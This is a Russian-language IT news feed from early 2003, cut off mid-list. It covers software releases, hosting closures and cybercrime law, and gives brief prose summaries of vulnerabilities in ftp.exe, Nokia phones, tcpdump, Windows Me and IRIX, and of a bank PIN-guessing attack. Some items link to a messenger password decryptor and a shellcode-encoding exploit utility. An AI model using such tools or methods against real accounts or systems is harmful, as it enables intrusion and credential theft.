Как сообщается на linux.org.ru, 26 ферваля в комплексе "Башня 2000" состоялась официальная презентация StarOffice 6. Все было точно также, как в анонсе. Из выступлений самым интересным было то, что продвигать StarOffice собираются прежде всего в госсектор, крупным корпоративным покупателям и через OEM-каналы. Все выступающие повторяли, что России MS Office не по карману и надеялись на то, что в самом ближайшем будущем у StarOffice будет не менее трети рынка. Розничная цена 1 копии StarOffice составляет 60$, при покупке 25 и более копий она снижается до 30. Для любых образовательных учреждений StarOffice и вся техничекая поддержка бесплатны. Подробности - http://ru.sun.com/win/news/events/2003/february/ev260203.html
3/03/2003 11:39 Разработка безопасных приложений для СУБД MySQL.
На сайте securityfocus опубликована довольно интересная статья Kristy Westphal "Secure MySQL Database Design", посвящённая описанию разработки безопасных приложений для СУБД MySQL. Описаны различные методы создания безопасных приложений для работы с базами данных, но основной акцент сделан к СУБД MySQL, как самой распространённой. О статье оповестил широкой Интернет-общественность Hal Flynn из Symantec Corp. в списке рассылки BUGTRAQ. Cтатья - http://www.securityfocus.com/infocus/1667
3/03/2003 11:08 Украина лишилась бесплатного хостинга.
С 1 марта 2003 года крупнейший украинский портал Bigmir.Net прекратил предоставлять сервис бесплатного хостинга. У владельцев бесплатных страниц на Bigmir.Net будет возможность до 1 апреля забрать свои файлы с сервера, по окончании этого срока, доступ к этой части портала будет закрыт, а вся информация уничтожена. На сервисе Бигмира было размещено порядка 50 тыс. домашних страниц пользователей, количество активных сайтов среди них - порядка 20-25%. На протяжении последних двух лет в Украине с определенной периодичностью появлялись различные сервисы бесплатного хостинга, которые впоследствии прекращали свое существование. Последним подобный сервис закрыл Бигмир и теперь в Украине нет возможности анонимно и бесплатно разместить собственные веб-страницы. Источник - http://www.cnews.ru
3/03/2003 10:27 Уязвимость в ftp.exe и tftp.exe.
Как пишет в своём письме в список рассылки BUGTRAQ Max <rusmir@tula.net>, им обнаружена уязвимость в ftp.exe и tftp.exe, в которых не производится проверка длины буфера параметра hostname до того, как его значение будет передано функции gethostbyname(). Это позволяет привести к отказу функционирования этих клиентов при передаче достаточной длинной (~550+ bytes) строки параметра hostname. Cамое примечательное, что и сама Microsoft указывает на это на своём сайте, где приводятся рекомендации для разработчиков сетевых приложений (см. ссылку). Обнаружена эта "особенность" была в W2KPro. Источник - http://www.securityfocus.com
3/03/2003 10:02 IsoNews - теперь собственность правительства США.
Закрыт один из самых известных пиратских сайтов IsoNews. Теперь на главной странице сайта красуется грозное предупреждение всем "лицам, занимающимся нелегальным копированием, воспроизведением или дистрибуцией защищенной копирайтом продукции, такой как фильмы, игры, музыка или программное обеспечение". Висят логотипы министерства внутренних дел и таможенного управления. Дэвид Рoччи (David Rocci) aka krazy8, автор и бывший теперь уже хозяин сайта может получить до 5 лет тюрьмы и выплатит до полумиллиона долларов компенсации. Интересно, что основным пунктом обвинения было распространение модифицированных чипов для Xbox - ни варезный софт, ни варезные же релизы игр не подвели американское правосудие к такому историческому решению, а вот игровая приставка одной известной компании - да подвела, и быстро. То есть, либо к закрытию были приложены руки этой компании (в последнее время активизировавшей, как мы помним, работу с разнообразными правительствами), либо просто... это нарушение оказалось легче всего доказать. И найти конкретных обвиняемых. Источник - http://www.kaspersky.ru
2/03/2003 14:52 Уязвимость в телефонах Nokia.
Компания @stake, занимающаяся безопасностью (Кембридж, Массачусетс, США), обнаружила уязвимость в ПО сотового телефона фирмы Nokia 6210. Используя эту уязвимость удалённый атакующий может вызвать ситуацию, подобную DoS в мире сетевых технологий. Уязвимость заключается в процедуре обработки так называемых vCards - виртуальных бизнес-карт, которые могут быть переданы от одного телефона к другому при помощи SMS. Уязвимости подвержены Nokia 6210 c ПО версии 05.27 и выше. Для использования уязвимости злоумышленник должен создать vCard, которая по длину превышает максимальную длину SMS-сообщения и содержит в себе поля с большим количеством символов формата строки (format string characters). При приёме телефоном последней части vCard происходит переполнение буфера ПО сотовика и он перестаёт функционировать. Реакция самого телефона может быть различна - он может перезагрузиться, блокироваться или перестать переключать SMS-сообщения. Для возобновления нормального функционирования необходимо вынуть и вставить обратно аккумуляторы. Более подробно - http://news.yahoo.com/news?tmpl=story2...
2/03/2003 14:21 "Инсталляция OpenBSD на iBook.
Вышла статья Gilbert Fernandes, которая описывает процесс установки на iBook, выпускаемый известной фирмой Apple, операционной системы OpenBSD. Процесс описан применительно к так называемому "dual-usb ibook" (http://www.apple-history.com/frames/?&page=gallery&model=ibook_late_2001), также известному, как "последняя модель 2001 года" ("late 2001"). Помимо процесса инсталяции, установки программ из исходников, применения патчей, внимание также уделено конфигурированию фреймбуфера через XF86Config. Хотелось бы заметить, что при попытке открытия ссылки, приведённой ниже, при помощи IE6 была получена ошибка HTTP 406 - "Не приемлемо Internet Explorer". Так что заинтересованным рекомендуется использовать другие броузеры (у меня получилось при помощи Phoenix). Статья - http://open.bsdcow.net/articles/ibook-faq/index.html
2/03/2003 13:46 Британия: малый и средний бизнес как инкубатор известных вирусов.
SMEs или по-русски предприятия среднего и малого бизнеса не обновляют антивирусные программы достаточно систематично, что очень беспокоит экспертов в сфере IT-security. Вирусы типа Klez и Bugbear находятся в сети, хотя были идентифицированы и профилактированы несколько месяцев назад. И все благодаря совсем небольшим британским фирмам. По сообщению vnunet, антивирусная компания-дилер Sophos, проанализировав реалии SMEs, обнаружила, что меньше, чем половина опрошенных компаний (а именно 46%) имеет какую-нибудь защиту от вирусов на входе своей локальной сети и только 42% обновляют свое антивирусное ПО более, чем раз в неделю. «Обновлять антивирусное ПО только раз в неделю похоже на чистку зубов только раз в неделю. Это дает вам минимум защиты и может привести к болезненным последствиям в будущем», - говорит Грэхем Клулей ( Graham Cluley ), старший технический эксперт в компании Sophos Anti-Virus. Источник - http://www.crime-research.org/
2/03/2003 13:14 IBM разработала самый быстрый процессор PowerPC.
Корпорация IBM готовится представить серию новых высокопроизводительных блейд-серверов на базе 64-разрядных процессоров PowerPC. Новинка будет предназначена для решения задач, требующих большого объема вычислительных ресурсов. На базе новых блейд-серверов можно будеть строить сложные вычислительные системы и кластеры, работающие под управлением Linux и Unix. Одним из самых интересных нововведений в серверах IBM PowerPC Blade станут новые 64-разрядные процессоры PowerPC 970. Они будут основаны на широко известной архитектуре Power4, применяющейся сегодня во многих серверах IBM. Новые процессоры будут работать на частотах 1,8-2,5 ГГц, а значит станут самыми мощными чипами с архитектурой PowerPC. Новые процессоры будут выпускаться по 0,13-микронной КМОП-технологии с медными межсоединениями и применением технологии "кремний-на-изоляторе" (SOI). На чипе интегрирована кэш-память объемом 512 кб и с коррекцией ошибок. Кэш первого уровня и системная шина будут работать с проверкой четности. В процессоре имеется поддержка набора дополнительных инструкций Altivec, а пропускная способность системной шины, работающей на полезной частоте 900 МГц (физическая частота 450 МГц), составляет 6,4 Гбайт/с. Ориентировочная производительность процессора с частотой 1,8 ГГц составляет по тесту SPECint2000 937 баллов, по тесту SPECfp2000 - 1051 балл, а по тесту Dhrystone MIPS - 5220 баллов. Источник - http://www.ferra.ru
2/03/2003 12:05 802.11i - новый стандарт безопасности для локальных беспроводных сетей.
На прошедшем Форуме разработчиков Intel (IDF) представители основных компаний-участников сделали несколько заявлений относительно будущих стандартов безопасности WLAN-сетей. В настоящее время для всего семейства IEEE 802.11 стандартом криптозащиты является протокол WEP (Wired Equivalent Privacy). Однако, из-за некоторых присущих ему недостатков он легко поддается взлому, при этом увеличение длины ключа не дает существенного результата. На смену WEP должен прийти стандарт 802.11i, представляющий из себя комплексную систему обеспечения безопасности. Она включает в себя системы аутенфикации, создания новых ключей для каждой сессии, управления ключами (на базе технологии Remote Access Dial-In User Service, RADIUS), проверки подлинности пакетов и т.д. Как прогнозирует инженер Intel по сетевой архитектуре Джесси Уокер, входящий в группу по разработке 802.11i, первые сертифицированные для этого стандарта продукты WLAN-продукты появятся не ранее чем через год. До этого момента пользователи должны получить WPA (Wireless Protected Access) - составную часть 802.11i, уже одобренную промышленной группой WiFi Alliance. Начиная с августа этого года, WPA будет включен во все сертифицированные WiFi-продукты. Представитель компании Cisco добавил, что в дополнение к стандартным средствам в своих продуктах компания продолжит применять проприетарные системы защиты, например, такие как Cisco Key Integrity Protocol (CKIP). Источник - http://www.pcworld.com/
2/03/2003 11:39 С днем рождения, компакт!
1 марта исполнилось 20 лет с того дня, как в Великобритании стали продаваться компакт-диски. Можно констатировать, что скептики, а также фанаты винила, считавшие маленькие серебристые пластинки преходящей модой, оказались неправы. Первые проигрыватели для компакт-дисков появились в Японии в 1982 году. Первой выпущенным в массовую продажу альбомом была "52-ая стрит" Билли Джоэла. Однако еще в течение нескольких месяцев британские магазины выжидали. Многие опасались, что компат-диск повторит судьбу видеокассет Бетамакс, которые, при всей их полезности, так и не смогли стать стандартом на рынке любительской записи. Впрочем, еще несколько лет ушло на то, чтобы побороть некогда могущественный винил. В 1988-ом объем продаж компактов впервые превысил доход от реализации пластинок. Уже на следующий год в Великобритании было продано на четыре миллиона больше альбомов на CD. В том же, 1989-ом году альбом U2 Joshua Tree стал первым компактным "миллионером". Всего за 20 лет в мире было продано 1,8 миллиарда компакт-дисков. Источник - http://news.bbc.co.uk
2/03/2003 10:59 Как разбогатеть на Интернет-паперти.
Ещё одна статья на utro.ru, автором которой является Петр Ляхов посвящена (как следует из названия) т.н. попрошайничеству в Интернете. Наверняка, многие из вас сталкивались с одним из примеров - т.н. "нигерийские письма". На Западе клянчить не стесняются. Таких там называют "cyber-beggars" ("киберпопрошайки"). В Америке же онлайновое выпрашивание денег на разные цели поставлено на поток. Просят самые разные суммы. Один деятель хочет сразу миллион долларов. Кстати, в Рунете тоже есть сайт для профессиональных нищих (http://cyberbegger.narod.ru). Просят под разными предлогами. Одни представляют себя инвалидами, другие – неизлечимо больными, третьи – несчастной семейной парой, не имеющей возможность завести детей. Можно залить клавиатуру слезами, читая некоторые душераздирающие истории. Между тем, это бизнес, и очень выгодный. Без предпринимательской жилки здесь не обойтись. Умение перевоплощаться играет не последнюю роль. Вот некоторые из откровений кибернищих. 23-летняя Мэнди Эйуорд, студентка колледжа и официантка по совместительству из Чикаго, создавшая совсем недавно в Интернете свою страничку, где просит добрых людей помочь ей заплатить $30 тыс. долга за учебу и погасить минусовый баланс на кредитной карточке. Мэнди говорит, что ее проект принес ей уже $160. Маловато, но девушка не падает духом: "Я буду искать щедрую душу, которая поможет мне выбраться из этого переплета". В свою очередь, 26-летнему Брайану Нолану из Лос-Анджелеса уже повезло. "Отзывчивый, трудолюбивый и амбициозный врач", так он представляется, регулярно получает более $1000 в неделю. А начал того, что заявил, что ему нужно $40 тыс., чтобы рассчитаться с долгами. При помощи кибернищенствования вернула долги и 29-летняя жительница Нью-Йорка Кэрин Боснак, коих у нее набралось аж на $20 тысяч. Теперь, став знаменитостью, она собирается издать книгу о своей кибернищенской одиссее. Подробности - http://www.utro.ru/articles/20030221115052129061.shtml
2/03/2003 10:47 Интернет вне закона.
Под таким тенденциозным названием опубликована статья Андрея Сорокина на сайте utro.ru. Статья представляет собой краткий анализ состоявшегося в Питере "Северо-Западного Интернет-Форума – 2003". Сегодня российским владельцам Интернет-ресурсов не приходится особенно уповать на помощь со стороны законодательства - отечественная судебная система еще не готова говорить на языке высоких технологий, а вступать в тяжбы на международном уровне пока мало кто решается. Это было отмечено на "Северо-Западном Интернет-Форуме – 2003", финальная часть которого проходила 27 февраля в Таврическом дворце Санкт-Петербурга. На форуме обсуждались актуальные правовые проблемы, с которыми сталкиваются Интернет – ресурсы. Одна из них заключается, в частности, в том, что различные законодательные базы препятствуют вливанию российских Интернет - проектов, и особенно тех, которые занимаются электронной коммерцией, в мировое электронное сообщество. Например, если отечественный сетевой магазин обращается к покупателю на английском языке (ну, понятное дело, дабы расширить клиентскую базу), то представители США и других стран могут предъявить ему претензии согласно своему законодательству - потребовать наличия соответствующей лицензии и так далее, и наше законодательство никак не может защитить отечественного Интернет-бизнесмена. Не произошло особых изменений в вопросах авторского права в Сети. Автор "вывешенного" в Интернет текста может отстаивать свои права только в том случае, если его творение было растиражировано как книга. А чисто сетевой плагиат – копирование с одного сайта на другой – остается ненаказуемым, недоказуемым, а судебные издержки изрядно превышают возможную прибыль. Как отмечалось на форуме, самое обидное, что наши суды, похоже, не хотят и не собираются знакомиться с высокими технологиями. По вопросу сетевого плагиата они просят предоставлять доказательства в максимально доступной им форме, "так, чтобы и кухарка поняла, о чем идет речь". Следовательно, без ликбеза по Интернет суд не сможет понять сути дела. От истца требуется в настолько упрощенной форме объяснить свою претензию, что больше сил будет потрачено на перевод языка высоких технологий на "язык кухарки", и немногим хватает духу вести такую борьбу Подробнее - http://www.utro.ru/articles/internet/
2/03/2003 00:05 Новая версия Miranda ICQ Password Decryptor v1.2
Исправлен алгоритм поиска пароля, раньше если соединение происходило через SOCKS с авторизацией, то программа показывала именно этот пароль (т.е пароль для авторизации). Скачать: http://www.uinc.ru/scripts/load.cgi?files/neox/MPD.zip
1/03/2003 19:01 Выход XFree86 4.3.0.
Как сообщает linuxcenter.ru, вышла новая версия популёрного в мире открытых систем Х-сервера XFree86 - 4.3.0. Краткий перечень новых возможностей таков: как и ожидалось, произведена частичная интеграция с RandR (масштабирование и перемещение главного окна "на лету"); Mesa-версия XFree86 теперь использует OpenGL® 1.3 и DRI 4.0.4; библиотека XCursor теперь поддерживает частичную прозрачность (альфа-канал) и анимацию курсоров. В настоящий момент XFree86 4.0.3 можно получить через CVS, tar-архив исходного кода появится через несколько дней, а откомпилированная версия - на следующей неделе. Подробности - http://cvsweb.xfree86.org/cvsweb/~checkout...
1/03/2003 16:22 Panda Antivirus Platinum 7.0 борется с телефонным мошенничеством.
После получения огромного количества отчетов об обнаружении вирусов, устанавливающих соединения с платными телефонными номерами, компания Panda Software включила в свой новый продукт Panda Antivirus Platinum 7.0 целевой модуль для защиты от атак подобного типа. Система «антидозвона» (блокиратор исходящих звонков) предотвращает установление несанкционированных телефонных соединений. Обычно такие соединения устанавливаются «дозвонщиками» – небольшими программами, предназначенными для обмана пользователей и соединения их компьютеров с платными телефонными линиями. Программы данного типа могут быть загружены автоматически, без ведома пользователя, при посещении ими опасных веб страниц (порнографических сайтов, сайтов, предлагающих нелегальное программное обеспечение, и т.п.). Как правило, пользователи и не подозревают ни о чем до тех пор, пока не приходит огромный счет за услуги связи. Для защиты от подобного рода мошенничества Panda Antivirus Platinum 7.0 регистрирует номера модемных пулов, используемых для соединения с сетью Internet. В результате, при попытке какой-либо программы соединиться с номером, отличающимся от зарегистрированного, Panda Antivirus Platinum 7.0 выдает предупреждение и требует разрешения на установку данного соединения. Пользователю всего лишь необходимо в экране настройки указать список телефонных номеров, которые модем может использовать для выхода в Internet. Источник - http://www.viruslab.ru
1/03/2003 15:18 Сообщения SMS совершенно незащищены.
Сотрудник, работающий у одного известного GSM-оператора Великобритании, поведал насколько на самом деле беззащитен SMS-сервис. Суть дела в следующем. Оператор устанавливает у себя SMS-центр (SMSC), производителями этого ПО являются такие компании как, например, LogicaCMG или Schlumberger SEMA. Грубо говоря, SMSC представляет собой громадный почтовый сервер, который хранит и форвардит почту (текстовые сообщения). По словам вышеупомянутого сотрудника, сообщения остаются на SMSC в среднем 15 дней, и ЛЮБОЙ сотрудник клиентской службы может читать эти SMS, чтобы войти в систему не требуется ни пароля, ни разрешений. Многие консультанты во время работы развлекаются тем, что выдергивают наобум сообщение с SMSC, читают его, далее смотрят ответное сообщение и так по цепочке восстанавливают весь диалог. Также можно передать с SMSC поддельное сообщение и сделать так, что получатель подумает, что оно пришло от определенного абонента. Интересно, а как с этим обстоит дело у нас? О новости поведал сайт mobile-review.com. Источник - http://www.theinquirer.net
1/03/2003 14:54 В ЕС хакеров будут сажать в тюрьму.
Преступления, совершенные хакерами и создателями вредоносных программ в странах ЕС, будут отныне караться тюремным заключением сроком до 5 лет, в случае, если преступление является тяжким. За совершение менее тяжких преступлений интернет-преступников будут сажать в тюрьму сроком до 3-х лет. Соответствующая договоренность достигнута министрами стран Евросоюза, которые одобрили поправки к закону о «киберпреступности». В апреле прошлого года Европарламент обнародовал текст законопроекта о «киберпреступности». Объединенная Европа, где отмечается значительный рост атак на компьютерные сети, решила более серьезно относиться к хакерам и их проделкам. Не остались в стороне и создатели вредоносных программ, противоправные действия которых также попадают под действие закона о «киберпреступности». В Европе, похоже, все еще помнят эпидемию вируса «I love you», принесшего убытки на многие миллионы долларов. Тем временем, в январе 2004 года в ЕС начнет работу агентство по безопасности информации и компьютерных сетей. На первые 5 лет в бюджет новой структуры заложено 33 млн евро. Цель агентства — борьба с компьютерным пиратством и обеспечение быстрого обмена информацией между странами ЕС при появлении подобных угроз. С помощью агентства планируется усилить безопасность компьютерных сетей, а также способность стран ЕС предотвращать атаки хакеров. Источник - http://www.webplanet.ru/
1/03/2003 14:12 В Саранске разобрались с хакером.
Впервые в России компьютерщик осужден по статье «Создание вредоносных программ для ЭВМ». Им стал житель Саранска Андрей Эрзяйкин. Городской суд Пролетарского района столицы Мордовии осудил его на один год лишения свободы условно по статье 273 УК РФ «Создание, использование и распространение вредоносных программ для ЭВМ». Как сообщил РИА «Новости» гособвинитель Евгений Максимочкин, впервые в России гражданин осужден по этой статье. Следствием установлено, что программа, созданная Эрзяйкиным, позволяла изменять и обнулять данные по выручке, которые хранились в фискальной памяти контрольно-кассовых машин. Программа злоумышленника умела также изменять дату и количество покупок. Распространение программы саранского хакера предотвратили сотрудники отдела по расследованию преступлений в сфере высоких технологий МВД Мордовии. Адвокат подсудимого Сергей Прончатов построил защиту на утверждении, что термин «ЭВМ» не применим к кассовому аппарату. В результате суд признал доводы защитника несостоятельными, однако адвокат намерен обжаловать решение суда. Источник - http://www.webplanet.ru/
1/03/2003 13:45 Virtuozzo размножает Windows.
Молодая компания SWsoft создала действующий прототип Windows-версии своего ПО, которое из одной операционной системы как бы делает несколько. Сейчас SWsoft продает версию своего ПО Virtuozzo для Linux. В октябре прошлого года руководители компании впервые обнародовали план его переноса на Windows. И вот этот план начинает исполняться: компания уверяет, что программа фактически позволяет создать 100 версий Windows на сервере с одним процессором Intel и 4 Гбайт памяти. В другой конфигурации одна копия Virtuozzo задействует четыре процессора и 8 Гбайт памяти. Virtuozzo создает несколько «виртуальных сред», сегментов со своими собственными вычислительными ресурсами, которые, однако, на самом деле используют одну и ту же базовую копию операционной системы. Каждую такую среду можно отдельно запускать, перезагружать или выключать. Главным конкурентом Virtuozzo является относительно распространенная программа VMware. Еще одного конкурента, Connectix, на прошлой неделе купила Microsoft. В отличие от конкурирующих продуктов, позволяющих исполнять несколько операционных систем, Virtuozzo может работать только с Linux или только с Windows. До сих пор основным рынком для SWsoft служили компании, «хостящие» большое число веб-сайтов. ПО Virtuozzo удешевляет таким компаниям возможность предоставлять отдельным клиентам контроль над их собственными веб-серверами. Сайт проекта - http://www.sw-soft.com/en/products/virtuozzo/
1/03/2003 13:12 МВД отмечает рост количества преступлений в сфере ИТ.
В России в 2002 г. совершено 6251 преступление в сфере высоких технологий, в том числе 3782 преступления, связанных с неправомерным доступом к компьютерной информации. Об этом сегодня на брифинге в МВД РФ сообщил заместитель начальника управления "К" МВД РФ Константин Мачабели. По его словам, число преступлений в сфере высоких технологий ежегодно возрастает в два раза, что связано с развитием и распространением новых информационных и телекоммуникационных технологий. К.Мачабели также отметил, что наибольшими темпами растет уровень преступлений в сфере компьютерной информации, что также связано с ростом числа пользователей компьютеров и средств связи. При этом, по данным управления "К", 90% преступлений в сфере высоких технологий являются латентными. По приблизительным оценкам, общий ущерб преступлений в сфере электронных платежей в России в прошлом году составил около $6 млрд. Источник - http://www.rbc.ru/
1/03/2003 12:30 Финский вызов "Майкрософту".
Под таким громким заголовком было опубликовано на сайте internet.ru интервью Пекки Химанена (Pekka Himanen), автора книги "Хакерская этика и дух информационной эры", которое было опубликовано во втором номере недавно появившегося журнала "Смысл". Также на сайте опубликован небольшой фрагмент книги Пекки. Подробности - http://www.internet.ru/article/articles/2003/02/27/9090.html
1/03/2003 12:05 Россия завалена "серыми" телефонами.
Количество нелегально ввозимых в Россию мобильных телефонов значительно превышает число легально ввозимых. Об этом сегодня на брифинге в МВД РФ сообщил заместитель начальника отдела управления "К" МВД РФ Александр Пименов. По его словам, наиболее распространен ввоз в Россию из-за рубежа аппаратов, давно снятых с производства. Кроме того, практикуется ввоз аппаратов, предназначенных исключительно для использования в зарубежных сетях сотовой связи. Как правило, такие аппараты имеют защиту от нелегального использования в других сетях, и поэтому перед их реализацией в России злоумышленники изменяют программное обеспечение в этих телефонных трубках, что приводит к сокращению срока службы телефона и возникновению проблем с его использованием. Также в России зарегистрированы факты, когда преступники реализуют телефоны с новыми корпусами, в которых установлена бывшая в употреблении "электронная начинка". По словам А.Пименова, появление таких телефонов зафиксировано даже в офисах продаж компаний, широко рекламирующих себя в прессе и на телевидении. Так, в настоящий момент проводятся контрольные закупки в офисах продаж компании, имеющей в столице 33 салона сотовой связи. В рамках данной операции в центре Москвы выявлен склад, где так называемые "серые трубки" готовились к продаже. Источник - http://www.cnews.ru
1/03/2003 11:57 Компания Google получила первый патент.
Калифорнийская компания Google - создатель одноименной поисковой системы - запатентовала метод определения релевантности веб-страниц, отбираемых по запросу пользователя, сообщается на сайте CNET News.com. Заявка была подана представителями компании еще в июне 2001 года. Патентное свидетельство опубликовано на сайте Патентного бюро США. Это свидетельство стало для Google первым. Ранее компания подала еще три заявки с просьбой выдать патенты на методы и технологии поиска страниц по нечетко определенным запросам и на основе анализа их посещаемости. Кроме того, сооснователь Google Ларри Пейдж (Larry Page) разработал систему PageRank, патент на которую был выдан попечительскому совету университета Leland Stanford. Эта система предназначена для расчета популярности и релевантности веб-страниц по числу найденных ссылок на них. Подробности - http://news.com.com/2100-1024-986204.html
28/02/2003 18:03 Атака на PIN-код банковских карт.
Как сообщается на bugtraq.ru, Mike Bond и Piotr Zielinski из Кембриджского университета опубликовали интересный документ, в котором описывается, как нечестный сотрудник банка может довольно быстро вычислять PIN-коды к карточкам клиентов. Обычно коды никогда не появляются в открытом виде и хранятся в специальном устройстве - Host Security Module (HSM), которое просто отвечает на предъявленный (в зашифрованном виде) код Yes/No. Количество попыток при проверке PIN-кода с банкомата обычно ограничено 3 попытками, но внутри банка программист может подбирать код со скоростью 60 вариантов в секунду. Очевидно, что для подбора 4-значного кода в среднем нужно перебрать 5000 комбинаций; описанный метод подмены таблиц децимализации позволяет подобрать код с 15 попыток, что существенно уменьшает время подбора. К счастью данная проблема касается только карт с магнитной полосой и "тупых" чиповых карт, которые содержать в своем ОЗУ ту же информацию, что и магнитная полоса, и для проверки PIN-кода обращаются к HSM. Современные же смарт-карты (типа GemPlus, использующихся в платежной системе "Аккорд") проверяют PIN-код при помощи встроенного процессора карты и позволяют этот код менять. Источник - http://www.reseaux-telecoms.net/news_btree/03_02_26_161454_304/News_view
28/02/2003 17:25 Семинар "Системы управления комплексной антивирусной защитой предприятия на основе решений Лаборатории Касперского".
Компания SoftLine приглашает Вас принять участие в бесплатном семинаре "Системы управления комплексной антивирусной защитой предприятия на основе решений Лаборатории Касперского". Участники смогут узнать о способах защиты корпоративной информации с помощью антивирусных продуктов лаборатории Касперского. В ходе доклада будут рассмотрены вопросы вирусной угрозы корпоративным сетям и схемы антивирусной защиты. Будет рассказано о новых продуктах Лаборатории Касперского для рабочих станций, файловых серверов и почтовых серверов. Особое внимание будет уделено управлению защитой в рамках крупных предприятий. Начало регитрации в 9.30 4 марта 2003 г. Место проведения семинара: г.Москва, ул. Губкина, д. 8 Математический институт им. Стеклова. Для участия необходимо зарегистрироваться. Регистрация - http://www.softline.ru/seminar.asp?catalog%5Fname=SoftLine...
28/02/2003 16:41 Уязвимость в TCPDUMP.
Как сообщает iDEFENSE Labs, обнаружена уязвимость в TCDUMP - утилите, применяемой для прослушивания (сниффинга) локальной сети в *NIX-ОС. Связана она с неверным разбором ISAKMP-пакетов (порт 500/UDP). Уязвимость позволяет удалённому злоумышленнику при помощи специально сформированного ISAKMP-пакета вогнать TCDUMP в цикл, что может предотвратить от просмотра сетевого трафика администратором. Уязвимость обнаружена в версиях 3.6, 3.6.3, 3.7.1, собранных с использованием библиотеки LIBPCAP версий .6 и .7 на платформах LINUX и FreeBSD. Для скачивания доступны новые версии tcpdump и libpcap. Подробности - http://www.idefense.com/advisory/02.27.03.txt
28/02/2003 13:55 Гимн системных администраторов.
Обнаружил тут на сайте www.sysadmins.ru в разделе HUMOR ссылочку, по которой выложен якобы гимн системных администраторов. Рекомендую послушать. :) Представляет собой переделанную песню Ю.Визбора про атлантов, вместо коих, как легко догадаться фигурируют СИСАДМИНы. Формат MP3, размер небольшой - чуть больше четверти мегабайта. Гимн - http://dallas.lv.net/admins.mp3
28/02/2003 13:03 Microsoft исправляет уязвимость в Windows Me.
Microsoft выпустила на этой неделе патч для новой серьезной уязвимости в ОС Windows Me, которая позволяет атакующим запустить код на удаленной машине. Уязвимость связана с ошибкой переполнения буфера в Help and Support Center. Уязвимость была обнаружена французской командой The Hackademy Audit team. Конкретно, проблема лежит в обработке URL с префиксом "hcp://", который используется для запуска ссылки на Help and Support Center. Для эксплуатации ошибки злоумышленнику необходимо создать URL, который запускает программный код атакующего, когда пользователь пытается перейти по нему. Атакующий может как разместить ссылку на веб-сайте, так и отправить ее по почте. В случае атаки с веб-сайта, если пользователь нажимает на ссылку, атакующий получает затем возможность читать или открывать файлы на удаленной машине. Если ссылку присылают по электронной почте, сценарий становится более сложным. Пользователи, использующие Outlook 2002 или Outlook Express 6.0 в стандартной конфигурации или Outlook 98 или 2000 с установленным обновлением Outlook Email Security Update должны нажать на ссылку для начала атаки. Однако и пользователи, не использующие эти конфигурации, могут подвергнуться атаке, как только они откроют зараженное письмо. Microsoft выпущен соответствующий бюллетень MS03-006. Подобной же уязвимостью может обладать и WinXP, если в системе не установлен патч MS02-060. MS03-006 - http://www.microsoft.com/technet/security/bulletin/MS03-006.asp
28/02/2003 12:42 Microsoft облегчает переход на Windows XP.
Microsoft выпустила инструментарий, который, по словам разработчиков, поможет компаниям уменьшить на 2/3 время разворачивания для Windows XP. Предлагаемый свободно пакет Windows XP Application Compatibility Toolkit 2.6 на сайте Desktop Center разработан для поощрения адаптации Windows XP и Office в корпоративные среды. По словам представителей компании, разработанный набор программных средств уменьшит время, необходимое для тестирования и обновления приложений, запускаемых под Windows XP. Инструментарий позволяет проверять приложения на степень их оптимизации для операционной системы. Как заявил корпоративный вице-президент по управлению Windows-продуктами Роджерс Уид (Rogers Weed), промышленные клиенты уже обращались к компании с просьбами создать подобные инструментарий и ресурсы. В набор инструментария также включен Microsoft Baseline Security Analyzer 1.1, проверяющий корпоративные настольные системы на отсутствие обновлений безопасности и пакетов обновлений. Кроме того, это ПО определяет общие системные микроконфигурации. По мнению специалистов, совместимость приложений является одной из главных проблем на предприятиях, оценивающих сейчас возможность развертывания у себя Windows XP. К тому же ситуация, когда необходимо проверить на совместимость сотни и тысячи приложений перед установкой новой ОС, не является необычной для предприятий. Источник - http://www.cnews.ru/
28/02/2003 12:35 ICQ: исчезающие контакты.
Обнаружил тут довольно любопытное сообщение на сайте "Лаборатории Касперского". Как пишет там Кирилл "Хват" Иванский, он обнаружил полную потерю контакт-листов в своей ICQ 2003a 3777. "Беглый осмотр IT-новостных ресурсов ничего не дал. Но жалобы продолжали поступать в оффлайне. Наконец, на Dirty.ru обнаружилось уже достаточно массовое обсуждение проблемы. Если кратко - да, контакт-листы действительно исчезают, проблемы в основном с версиями 2002 и 2003 (2000-2001 для Win, все версии для Mac, Trillian и Miranda - вполне себе хорошо работают), и, само собой, только у тех людей, кто хранит контакты на сервере. У кого-то контакты восстанавливались через 15-20 минут (2003 в основном, мне же почему-то не повезло), у кого-то нет". Далее позволю себе процитировать Дениса Зенкина, начальника информационной службы "Лаборатории Касперского": По всей видимости имел место именно сбой программного или аппаратного обеспечения сервера, который управляет коммуникациями и базой данных ICQ. Пока что нет причин полагать, что это произошло по причине компьютерных вирусов или хакерской атаки, хотя такой вариант событий тоже не исключен. В настоящий момент масштаб бедствия определить трудно: некоторые источники (в частности, "Известия") сообщают о том, что контакт-списки потеряло до 30% пользователей. По нашим предварительным оценкам эта цифра все же ниже, порядка 5-10%. Официальные источники пока что никак не прокомментировали ситуацию". Вот такая вот интересная информация. Источник - http://www.viruslist.com/index.html?tnews=1007&id=1875136
28/02/2003 11:49 Уязвимость в утилите /sbin/ps в ОС IRIX.
Выпущен бюллетень по безопасности от фирмы SGI Inc. 20030202-01-I, в котором утверждается, что в утилите ps (process status) в OC IRIX содержится уязвимость, позволяющая локальному пользователю получить привилегии суперпользователя. Уязвимость ограничена версией 6.5.4 и всем администраторам рекомендуется обновиться до версии 6.5.5. Подробности - ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2003-SCO.1.1/CSSA-2003-SCO.1.1.txt
28/02/2003 11:27 Утилита makeunicode2.py.
Immunity, Inc. анонсировала доступность новой утилиты makeunicode2.py - представляющую собой скрипт на языке Python, предназначенный для кодирования произвольного шалл-кода в строку кодировки unicode. Данная утилита может быть использована для внедрения шеллкода при проведении атак на переполнение буфера из-за большой длины сегмента. Изначально эта утилита входила в продукт Immunity, Inc. под названием CANVAS, предназначенного для демонстрации возможностей уязвимости различных программных продуктов (ссылка на него будет работать после 12 марта). Утилита - http://www.blackhat.com/html/win-usa-03/win-usa-03-speakers.html#David%20Aitel CANVAS - http://www.immunitysec.com/CANVAS/
28/02/2003 10:58 Очередная уязвимостьв Opera.
